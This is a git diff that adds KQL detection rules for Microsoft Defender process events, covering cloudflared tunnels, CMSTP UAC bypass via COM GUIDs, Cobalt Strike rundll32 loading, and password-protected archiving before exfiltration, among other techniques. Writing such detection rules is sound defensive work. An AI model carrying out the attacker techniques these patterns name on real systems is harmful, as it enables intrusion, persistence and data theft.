+| where (((FolderPath endswith "\\cloudflared.exe" or FolderPath endswith "\\cloudflared-windows-386.exe" or FolderPath endswith "\\cloudflared-windows-amd64.exe") or (SHA256 startswith "2fb6c04c4f95fb8d158af94c137f90ac820716deaf88d8ebec956254e046cb29" or SHA256 startswith "b3d21940a10fdef5e415ad70331ce257c24fe3bcf7722262302e0421791f87e8" or SHA256 startswith "1fbd8362b2d2d2e6a5750ae3db69cd1815e6c1d31da48a98b796450971a8e039" or SHA256 startswith "0409c9b12f9d0eda86e461ed9bdabeefb00172b26322079681a0bdf48e68dc28" or SHA256 startswith "7cfb411d04bac42ef93d1f0c93c0a481e38c6f4612b97ae89d4702595988edc7" or SHA256 startswith "5b3c2d846ab162dc6bc595cce3a49de5731afde5d6060be7066d21b013a28373" or SHA256 startswith "ce95df7f69664c3df19b76028e115931919a71517b776da7b42d353e2ff4a670" or SHA256 startswith "1293525a19cfe3bc8296b62fbfe19f083632ed644a1c18c10b045a1d3030d81a" or SHA256 startswith "af2b9161cfcb654b16408cd6b098afe9d1fb61a037d18d7090a119d4c0c8e0f0" or SHA256 startswith "39ddceb56a15798826a5fc4892fa2b474c444bb4d7a8bf2fa95e41cab10fa7a1" or SHA256 startswith "ccd11f2328023a0e7929e845d5b6e7bc783fb4650d65faef3ae090239d4bbce2" or SHA256 startswith "b6e5c5d2567ae8c69cc012ebcae30e6c9b5359d64a58d17ba75ec89f8bce71ac" or SHA256 startswith "f813484ea441404f18caad96f28138e8aaf0cb256163c09c2ab8a3acab87f69f" or SHA256 startswith "fc4a0802ab9c7409b892ca00636bec61e2acfc911bccfdeb9978b8ab5a2f828d" or SHA256 startswith "083150724b49604c8765c1ba19541fa260b133be0acb0647fcd936d81f054499" or SHA256 startswith "44303d6572956f28a0f2e4b188934fb9874f2584f5c81fa431a463cfbf28083b" or SHA256 startswith "5d38c46032a58e28ae5f7d174d8761ec3d64d186677f3ec53af5f51afb9bfd2f" or SHA256 startswith "e1e70fa42059911bc6685fafef957f9a73fc66f214d0704a9b932683a5204032" or SHA256 startswith "c01356092a365b84f84f0e66870bd1a05ba3feb53cafd973fa5fea2534bee234" or SHA256 startswith "b3f9c06151e30ee43d39e788a79cd918a314f24e04fe87f3de8272a2057b624f" or SHA256 startswith "cd81b2792f0739f473c31c9cb7cf2313154bfa28b839975802b90e8790bb5058" or SHA256 startswith "9ec7e6c8e1bfd883663d8d9d62c9e4f9ae373b731407181e32491b27a7218a2c" or SHA256 startswith "c2cfd23fdc6c0e1b1ffa0e545cbe556f18d11b362b4a89ba0713f6ab01c4827f" or SHA256 startswith "53f8adbd76c0eb16f5e43cadde422474d8a06f9c8f959389c1930042ad8beaa5" or SHA256 startswith "648c8d2f8001c113d2986dd00b7bbd181593d462bef73522cee212c4f71f95b3" or SHA256 startswith "ae047e2095e46c3f9c518b2be67ec753f4f0aad23b261a361fcb6144dcdb63b4" or SHA256 startswith "3153d2baa462978dd22ab33d1c2274ecc88c200225d6a3327f98d5b752d08f5c" or SHA256 startswith "f49cde976e628012c9db73e1c8d76081944ecf2297cdafeb78bb13290da274c4" or SHA256 startswith "d2513e58bb03ccc83affde685c6ef987924c37ce6707d8e9857e2524b0d7e90f" or SHA256 startswith "bb67c7623ba92fe64ffd9816b8d5b3b1ea3013960a30bd4cf6e295b3eb5b1bad" or SHA256 startswith "b34b3c3a91e3165d1481f0b3ec23eab93a1cfba94345a6cbfe5b18ddbd48eac7" or SHA256 startswith "f7848034e010d55f15e474ca998f96391e320ff29b00cfcc4c5e536529703e75" or SHA256 startswith "b6fc9493778cbe3bfc062d73f5cc604bc0ff058bc5e5dc6aac87f3a4008b54b6" or SHA256 startswith "f5c5e962577e2293c4ad10603816dce7cc273585969615fbf4e4bfa9eaff1688" or SHA256 startswith "d14c52d9220b606f428a8fe9f7c108b0d6f14cf71e7384749e98e6a95962e68f" or SHA256 startswith "d3a0e1a79158f3985cd49607ebe0cdfcc49cb9af96b8f43aefd0cdfe2f22e663" or SHA256 startswith "2fbbfc8299537ff80cadf9d0e27c223fe0ccb9052bf9d8763ad717bbfa521c77" or SHA256 startswith "19074674c6fbdaa573b3081745e5e26144fdf7a086d14e0e220d1814f1f13078")) and ((ProcessCommandLine contains "-url" and ProcessCommandLine contains "tunnel") or (ProcessCommandLine contains ".exe -url" or ProcessCommandLine contains ".exe --url"))) or (ProcessCommandLine contains "-url" and ProcessCommandLine contains "-no-autoupdate")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/cloudflared_tunnel_connections_cleanup.kql b/KQL/rules/windows/process_creation/cloudflared_tunnel_connections_cleanup.kql
new file mode 100644
index 00000000..5eef217c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/cloudflared_tunnel_connections_cleanup.kql
@@ -0,0 +1,12 @@
+// Title: Cloudflared Tunnel Connections Cleanup
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-17
+// Level: medium
+// Description: Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to cleanup tunnel connections.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1102, attack.t1090, attack.t1572
+// False Positives:
+//   - Legitimate usage of Cloudflared.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-config " or ProcessCommandLine contains "-connector-id ") and (ProcessCommandLine contains " tunnel " and ProcessCommandLine contains "cleanup ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/cloudflared_tunnel_execution.kql b/KQL/rules/windows/process_creation/cloudflared_tunnel_execution.kql
new file mode 100644
index 00000000..491b6dac
--- /dev/null
+++ b/KQL/rules/windows/process_creation/cloudflared_tunnel_execution.kql
@@ -0,0 +1,12 @@
+// Title: Cloudflared Tunnel Execution
+// Author: Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-17
+// Level: medium
+// Description: Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1102, attack.t1090, attack.t1572
+// False Positives:
+//   - Legitimate usage of Cloudflared tunnel.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-config " or ProcessCommandLine contains "-credentials-contents " or ProcessCommandLine contains "-credentials-file " or ProcessCommandLine contains "-token ") and (ProcessCommandLine contains " tunnel " and ProcessCommandLine contains " run ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/cmd_exe_missing_space_characters_execution_anomaly.kql b/KQL/rules/windows/process_creation/cmd_exe_missing_space_characters_execution_anomaly.kql
new file mode 100644
index 00000000..98de6b57
--- /dev/null
+++ b/KQL/rules/windows/process_creation/cmd_exe_missing_space_characters_execution_anomaly.kql
@@ -0,0 +1,11 @@
+// Title: Cmd.EXE Missing Space Characters Execution Anomaly
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-08-23
+// Level: high
+// Description: Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.
+// This could be a sign of obfuscation of a fat finger problem (typo by the developer).
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "cmd.exe/c" or ProcessCommandLine contains "\\cmd/c" or ProcessCommandLine contains "\"cmd/c" or ProcessCommandLine contains "cmd.exe/k" or ProcessCommandLine contains "\\cmd/k" or ProcessCommandLine contains "\"cmd/k" or ProcessCommandLine contains "cmd.exe/r" or ProcessCommandLine contains "\\cmd/r" or ProcessCommandLine contains "\"cmd/r") or (ProcessCommandLine contains "/cwhoami" or ProcessCommandLine contains "/cpowershell" or ProcessCommandLine contains "/cschtasks" or ProcessCommandLine contains "/cbitsadmin" or ProcessCommandLine contains "/ccertutil" or ProcessCommandLine contains "/kwhoami" or ProcessCommandLine contains "/kpowershell" or ProcessCommandLine contains "/kschtasks" or ProcessCommandLine contains "/kbitsadmin" or ProcessCommandLine contains "/kcertutil") or (ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "cmd /r")) and (not(((ProcessCommandLine in~ ("cmd.exe /c") or ProcessCommandLine contains "AppData\\Local\\Programs\\Microsoft VS Code\\resources\\app\\node_modules" or ProcessCommandLine endswith "cmd.exe/c .") or (ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd /r "))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/cmstp_execution_process_creation.kql b/KQL/rules/windows/process_creation/cmstp_execution_process_creation.kql
new file mode 100644
index 00000000..223ba1a2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/cmstp_execution_process_creation.kql
@@ -0,0 +1,12 @@
+// Title: CMSTP Execution Process Creation
+// Author: Nik Seetharaman
+// Date: 2018-07-16
+// Level: high
+// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001
+// False Positives:
+//   - Legitimate CMSTP use (unlikely in modern enterprise environments)
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\cmstp.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/cmstp_uac_bypass_via_com_object_access.kql b/KQL/rules/windows/process_creation/cmstp_uac_bypass_via_com_object_access.kql
new file mode 100644
index 00000000..4747747d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/cmstp_uac_bypass_via_com_object_access.kql
@@ -0,0 +1,12 @@
+// Title: CMSTP UAC Bypass via COM Object Access
+// Author: Nik Seetharaman, Christian Burkard (Nextron Systems)
+// Date: 2019-07-31
+// Level: high
+// Description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, attack.t1218.003, attack.g0069, car.2019-04-001
+// False Positives:
+//   - Legitimate CMSTP use (unlikely in modern enterprise environments)
+
+DeviceProcessEvents
+| where (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and (InitiatingProcessCommandLine contains " /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains " /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}" or InitiatingProcessCommandLine contains " /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}" or InitiatingProcessCommandLine contains " /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}" or InitiatingProcessCommandLine contains " /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}") and InitiatingProcessFolderPath endswith "\\DllHost.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/cobaltstrike_load_by_rundll32.kql b/KQL/rules/windows/process_creation/cobaltstrike_load_by_rundll32.kql
new file mode 100644
index 00000000..3d9c8427
--- /dev/null
+++ b/KQL/rules/windows/process_creation/cobaltstrike_load_by_rundll32.kql
@@ -0,0 +1,10 @@
+// Title: CobaltStrike Load by Rundll32
+// Author: Wojciech Lesicki
+// Date: 2021-06-01
+// Level: high
+// Description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".dll" and (ProcessCommandLine endswith " StartW" or ProcessCommandLine endswith ",StartW")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or (ProcessCommandLine contains "rundll32.exe" or ProcessCommandLine contains "rundll32 "))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/code_execution_via_pcwutl_dll.kql b/KQL/rules/windows/process_creation/code_execution_via_pcwutl_dll.kql
new file mode 100644
index 00000000..e4e47e90
--- /dev/null
+++ b/KQL/rules/windows/process_creation/code_execution_via_pcwutl_dll.kql
@@ -0,0 +1,12 @@
+// Title: Code Execution via Pcwutl.dll
+// Author: Julia Fomina, oscd.community
+// Date: 2020-10-05
+// Level: medium
+// Description: Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+// False Positives:
+//   - Use of Program Compatibility Troubleshooter Helper
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "pcwutl" and ProcessCommandLine contains "LaunchApplication") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/codepage_modification_via_mode_com_to_russian_language.kql b/KQL/rules/windows/process_creation/codepage_modification_via_mode_com_to_russian_language.kql
new file mode 100644
index 00000000..f6a05000
--- /dev/null
+++ b/KQL/rules/windows/process_creation/codepage_modification_via_mode_com_to_russian_language.kql
@@ -0,0 +1,13 @@
+// Title: CodePage Modification Via MODE.COM To Russian Language
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2024-01-17
+// Level: medium
+// Description: Detects a CodePage modification using the "mode.com" utility to Russian language.
+// This behavior has been used by threat actors behind Dharma ransomware.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+// False Positives:
+//   - Russian speaking people changing the CodePage
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " con " and ProcessCommandLine contains " cp " and ProcessCommandLine contains " select=") and (ProcessCommandLine endswith "=1251" or ProcessCommandLine endswith "=866")) and (FolderPath endswith "\\mode.com" or ProcessVersionInfoOriginalFileName =~ "MODE.COM")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/com_object_execution_via_xwizard_exe.kql b/KQL/rules/windows/process_creation/com_object_execution_via_xwizard_exe.kql
new file mode 100644
index 00000000..89f77414
--- /dev/null
+++ b/KQL/rules/windows/process_creation/com_object_execution_via_xwizard_exe.kql
@@ -0,0 +1,11 @@
+// Title: COM Object Execution via Xwizard.EXE
+// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-10-07
+// Level: medium
+// Description: Detects the execution of Xwizard tool with the "RunWizard" flag and a GUID like argument.
+// This utility can be abused in order to run custom COM object created in the registry.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ProcessCommandLine =~ "RunWizard" and ProcessCommandLine matches regex "\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/command_line_execution_with_suspicious_url_and_appdata_strings.kql b/KQL/rules/windows/process_creation/command_line_execution_with_suspicious_url_and_appdata_strings.kql
new file mode 100644
index 00000000..336fc214
--- /dev/null
+++ b/KQL/rules/windows/process_creation/command_line_execution_with_suspicious_url_and_appdata_strings.kql
@@ -0,0 +1,12 @@
+// Title: Command Line Execution with Suspicious URL and AppData Strings
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.command-and-control, attack.t1059.003, attack.t1059.001, attack.t1105
+// False Positives:
+//   - High
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http" and ProcessCommandLine contains "://" and ProcessCommandLine contains "%AppData%") and FolderPath endswith "\\cmd.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql b/KQL/rules/windows/process_creation/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql
new file mode 100644
index 00000000..85a13b25
--- /dev/null
+++ b/KQL/rules/windows/process_creation/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql
@@ -0,0 +1,12 @@
+// Title: Compress Data and Lock With Password for Exfiltration With 7-ZIP
+// Author: frack113
+// Date: 2021-07-27
+// Level: medium
+// Description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+// False Positives:
+//   - Legitimate activity is expected since compressing files with a password is common.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " a " or ProcessCommandLine contains " u ") and (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe"))) and ProcessCommandLine contains " -p"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql b/KQL/rules/windows/process_creation/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql
new file mode 100644
index 00000000..12d2bac8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql
@@ -0,0 +1,10 @@
+// Title: Compress Data and Lock With Password for Exfiltration With WINZIP
+// Author: frack113
+// Date: 2021-07-27
+// Level: medium
+// Description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -min " or ProcessCommandLine contains " -a ") and ProcessCommandLine contains "-s\"" and (ProcessCommandLine contains "winzip.exe" or ProcessCommandLine contains "winzip64.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/compressed_file_creation_via_tar_exe.kql b/KQL/rules/windows/process_creation/compressed_file_creation_via_tar_exe.kql
new file mode 100644
index 00000000..dec61767
--- /dev/null
+++ b/KQL/rules/windows/process_creation/compressed_file_creation_via_tar_exe.kql
@@ -0,0 +1,13 @@
+// Title: Compressed File Creation Via Tar.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), AdmU3
+// Date: 2023-12-19
+// Level: low
+// Description: Detects execution of "tar.exe" in order to create a compressed file.
+// Adversaries may abuse various utilities to compress or encrypt data before exfiltration.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001
+// False Positives:
+//   - Likely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-c" or ProcessCommandLine contains "-r" or ProcessCommandLine contains "-u") and (FolderPath endswith "\\tar.exe" or ProcessVersionInfoOriginalFileName =~ "bsdtar")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/compressed_file_extraction_via_tar_exe.kql b/KQL/rules/windows/process_creation/compressed_file_extraction_via_tar_exe.kql
new file mode 100644
index 00000000..2ff126a0
--- /dev/null
+++ b/KQL/rules/windows/process_creation/compressed_file_extraction_via_tar_exe.kql
@@ -0,0 +1,13 @@
+// Title: Compressed File Extraction Via Tar.EXE
+// Author: AdmU3
+// Date: 2023-12-19
+// Level: low
+// Description: Detects execution of "tar.exe" in order to extract compressed file.
+// Adversaries may abuse various utilities in order to decompress data to avoid detection.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001
+// False Positives:
+//   - Likely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-x" and (FolderPath endswith "\\tar.exe" or ProcessVersionInfoOriginalFileName =~ "bsdtar")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql b/KQL/rules/windows/process_creation/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql
new file mode 100644
index 00000000..04dd2819
--- /dev/null
+++ b/KQL/rules/windows/process_creation/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql
@@ -0,0 +1,12 @@
+// Title: Computer Discovery And Export Via Get-ADComputer Cmdlet
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-11-10
+// Level: medium
+// Description: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1033
+// False Positives:
+//   - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " > " or ProcessCommandLine contains " | Select " or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "Set-Content" or ProcessCommandLine contains "Add-Content") and (ProcessCommandLine contains "Get-ADComputer " and ProcessCommandLine contains " -Filter *")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/computer_password_change_via_ksetup_exe.kql b/KQL/rules/windows/process_creation/computer_password_change_via_ksetup_exe.kql
new file mode 100644
index 00000000..0a39ead9
--- /dev/null
+++ b/KQL/rules/windows/process_creation/computer_password_change_via_ksetup_exe.kql
@@ -0,0 +1,10 @@
+// Title: Computer Password Change Via Ksetup.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-06
+// Level: medium
+// Description: Detects password change for the computer's domain account or host principal via "ksetup.exe"
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " /setcomputerpassword " and (FolderPath endswith "\\ksetup.exe" or ProcessVersionInfoOriginalFileName =~ "ksetup.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/computer_system_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/computer_system_reconnaissance_via_wmic_exe.kql
new file mode 100644
index 00000000..9658071a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/computer_system_reconnaissance_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: Computer System Reconnaissance Via Wmic.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-08
+// Level: medium
+// Description: Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "computersystem" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/conhost_exe_commandline_path_traversal.kql b/KQL/rules/windows/process_creation/conhost_exe_commandline_path_traversal.kql
new file mode 100644
index 00000000..157399cb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/conhost_exe_commandline_path_traversal.kql
@@ -0,0 +1,12 @@
+// Title: Conhost.exe CommandLine Path Traversal
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-14
+// Level: high
+// Description: detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/../../" and InitiatingProcessCommandLine contains "conhost"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/conhost_spawned_by_uncommon_parent_process.kql b/KQL/rules/windows/process_creation/conhost_spawned_by_uncommon_parent_process.kql
new file mode 100644
index 00000000..759237ba
--- /dev/null
+++ b/KQL/rules/windows/process_creation/conhost_spawned_by_uncommon_parent_process.kql
@@ -0,0 +1,10 @@
+// Title: Conhost Spawned By Uncommon Parent Process
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-28
+// Level: medium
+// Description: Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\conhost.exe" and (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\smss.exe" or InitiatingProcessFolderPath endswith "\\spoolsv.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\userinit.exe" or InitiatingProcessFolderPath endswith "\\wininit.exe" or InitiatingProcessFolderPath endswith "\\winlogon.exe")) and (not((InitiatingProcessCommandLine contains "-k apphost -s AppHostSvc" or InitiatingProcessCommandLine contains "-k imgsvc" or InitiatingProcessCommandLine contains "-k localService -p -s RemoteRegistry" or InitiatingProcessCommandLine contains "-k LocalSystemNetworkRestricted -p -s NgcSvc" or InitiatingProcessCommandLine contains "-k NetSvcs -p -s NcaSvc" or InitiatingProcessCommandLine contains "-k netsvcs -p -s NetSetupSvc" or InitiatingProcessCommandLine contains "-k netsvcs -p -s wlidsvc" or InitiatingProcessCommandLine contains "-k NetworkService -p -s DoSvc" or InitiatingProcessCommandLine contains "-k wsappx -p -s AppXSvc" or InitiatingProcessCommandLine contains "-k wsappx -p -s ClipSVC" or InitiatingProcessCommandLine contains "-k wusvcs -p -s WaaSMedicSvc"))) and (not((InitiatingProcessCommandLine contains "C:\\Program Files (x86)\\Dropbox\\Client\\" or InitiatingProcessCommandLine contains "C:\\Program Files\\Dropbox\\Client\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/console_codepage_lookup_via_chcp.kql b/KQL/rules/windows/process_creation/console_codepage_lookup_via_chcp.kql
new file mode 100644
index 00000000..5a6c2531
--- /dev/null
+++ b/KQL/rules/windows/process_creation/console_codepage_lookup_via_chcp.kql
@@ -0,0 +1,13 @@
+// Title: Console CodePage Lookup Via CHCP
+// Author: _pete_0, TheDFIRReport
+// Date: 2022-02-21
+// Level: medium
+// Description: Detects use of chcp to look up the system locale value as part of host discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1614.001
+// False Positives:
+//   - During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command.
+//   - Discord was seen using chcp to look up code pages
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "chcp" or ProcessCommandLine endswith "chcp " or ProcessCommandLine endswith "chcp  ") and FolderPath endswith "\\chcp.com" and (InitiatingProcessCommandLine contains " -c " or InitiatingProcessCommandLine contains " /c " or InitiatingProcessCommandLine contains " –c " or InitiatingProcessCommandLine contains " —c " or InitiatingProcessCommandLine contains " ―c " or InitiatingProcessCommandLine contains " -r " or InitiatingProcessCommandLine contains " /r " or InitiatingProcessCommandLine contains " –r " or InitiatingProcessCommandLine contains " —r " or InitiatingProcessCommandLine contains " ―r " or InitiatingProcessCommandLine contains " -k " or InitiatingProcessCommandLine contains " /k " or InitiatingProcessCommandLine contains " –k " or InitiatingProcessCommandLine contains " —k " or InitiatingProcessCommandLine contains " ―k ") and InitiatingProcessFolderPath endswith "\\cmd.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/control_panel_items.kql b/KQL/rules/windows/process_creation/control_panel_items.kql
new file mode 100644
index 00000000..74887005
--- /dev/null
+++ b/KQL/rules/windows/process_creation/control_panel_items.kql
@@ -0,0 +1,10 @@
+// Title: Control Panel Items
+// Author: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)
+// Date: 2020-06-22
+// Level: high
+// Description: Detects the malicious use of a control panel item
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.defense-evasion, attack.t1218.002, attack.persistence, attack.t1546
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "add" and ProcessCommandLine contains "CurrentVersion\\Control Panel\\CPLs") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) or (ProcessCommandLine endswith ".cpl" and (not(((ProcessCommandLine contains "regsvr32 " and ProcessCommandLine contains " /s " and ProcessCommandLine contains "igfxCPL.cpl") or (ProcessCommandLine contains "\\System32\\" or ProcessCommandLine contains "%System%" or ProcessCommandLine contains "|C:\\Windows\\system32|")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/convertto_securestring_cmdlet_usage_via_commandline.kql b/KQL/rules/windows/process_creation/convertto_securestring_cmdlet_usage_via_commandline.kql
new file mode 100644
index 00000000..48e23c77
--- /dev/null
+++ b/KQL/rules/windows/process_creation/convertto_securestring_cmdlet_usage_via_commandline.kql
@@ -0,0 +1,12 @@
+// Title: ConvertTo-SecureString Cmdlet Usage Via CommandLine
+// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
+// Date: 2020-10-11
+// Level: medium
+// Description: Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+// False Positives:
+//   - Legitimate use to pass password to different powershell commands
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "ConvertTo-SecureString" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
